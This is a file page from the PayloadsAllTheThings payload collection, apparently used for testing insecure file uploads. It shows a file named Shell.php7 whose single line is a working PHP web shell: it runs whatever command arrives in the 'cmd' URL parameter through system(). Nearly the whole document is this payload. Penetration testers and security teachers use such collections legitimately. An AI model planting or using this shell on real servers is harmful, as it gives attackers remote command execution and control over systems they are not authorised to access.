PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.php7

1 line
43 B
Plaintext
Raw Normal View History

2017-09-27 12:37:07 +00:00
<?php echo "Shell";system($_GET['cmd']); ?>